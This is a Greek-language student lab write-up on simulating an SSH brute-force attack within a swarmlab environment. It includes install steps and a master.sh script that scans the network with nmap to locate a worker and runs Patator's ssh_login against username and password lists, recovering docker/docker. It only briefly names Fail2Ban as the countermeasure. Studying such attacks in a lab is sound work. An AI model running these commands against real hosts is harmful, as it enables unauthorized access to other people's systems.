NetworkSecurityProject/2. SSH Brute Force

SSH Brute Force

Για την προσομοίωση της επίθεσης SSH Brute Force, επιλέξαμε να χρησιμοποιήσουμε το Patator.

Το Patator είναι ένα εργαλείο, γραμμένο σε python, για Brute Force επιθέσεις, με εξαιρετικά μεγάλο πλήθος modules και πολλές ευέλικτες ρυθμίσεις.

Εγκατάσταση του Patator

Όπως και σε όλα τα ερωτήματα της εργασίας, κάθε υλοποίηση γίνεται σε ξεχωριστό φάκελο. Επομένως, η εγκατάσταση θα γίνει εντός του SSH Brute Force directory. Ως kali users, έχουμε ήδη στη διάθεσή μας το συγκεκριμένο εργαλείο. Σε κάθε άλλη περίπτωση ακολουθούμε μόνο την πρώτη φορα χρήσης του τα εξής βήματα:

1. sudo apt update
2. sudo apt upgrade -y
3. sudo apt install patator -y
4. git clone https://github.com/lanjelot/patator.git

---

Εκτέλεση Επίθεσης

Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση.

sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login

Σημείωση: Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών:

1. python patator.py
2. python patator.py ssh_login (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.)

Το αποτέλεσμα της αναζήτησής μας, είναι η σωστή σύνταξη της εντολής για την εκτέλεση της επίθεσης. Στην προκειμένη περίπτωση, η εντολής είναι της μορφής **ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.' **

Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. ./master.sh

Το master.sh περιέχει τις εξής εντoλές:

• H my_ip περιέχει την ip διεύθυνση του master.

  my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')

*H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε.

network=$(echo $my_ip | sed 's/.[0-9]$/.*/')

• Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο grep worker_ψηφίο.

  worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')

• Με την ακόλουθη εντολή εκτελείται η επίθεση, όπου:

1. password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό

2. usernames.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό όνομα χρήστη

3. host: μεταβλητή που περιέχει την ip του επιτιθέμένου worker

   patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt

• Εάν δε θέλουμε να εμφανιστούν, όλες οι ανεπιτυχείς προσπάθειες της επίθεσης, αλλά μόνο ο σωστός κωδικός, πρέπει να συμπληρώσουμε -x ignore:mesg='Authentication failed.' και η προηγούμενη εντολή θα εκτελεστεί έτσι:

  patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt -x ignore:mesg='Authentication failed.'

Επειδή κάνουμε έλεγχο δύο παραγόντων (username και password), όλοι οι κωδικοί θα δοκιμαστούν για κάθε όνομα χρήστη. Το σωστό αποτέλεσμα, όπως είναι αναμενόμενο, είναι user: docker και password: docker

---

Αντιμετώπιση Επίθεσης

Αρχικά, θα πρέπει να συνδεθούμε στο worker που δέχεται την επίθεση με τη γνωστή εντολή ssh docker@ip , όπου ip, εκείνη του εκάστοτε κόμβου. Για την αντιμετώπιση της επίθεσης θα χρησιμοποιηθεί το εργαλείο Fail2Ban.

---

REFERENCES

1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae
2. https://en.kali.tools/?p=147
3. https://tools.kali.org/password-attacks/patator
4. https://github.com/lanjelot/patator
5. https://github.com/lanjelot/patator/blob/master/patator.py
6. https://www.unixmen.com/how-to-prevent-ssh-brute-force-attacks-with-fail2ban-on-debian-7/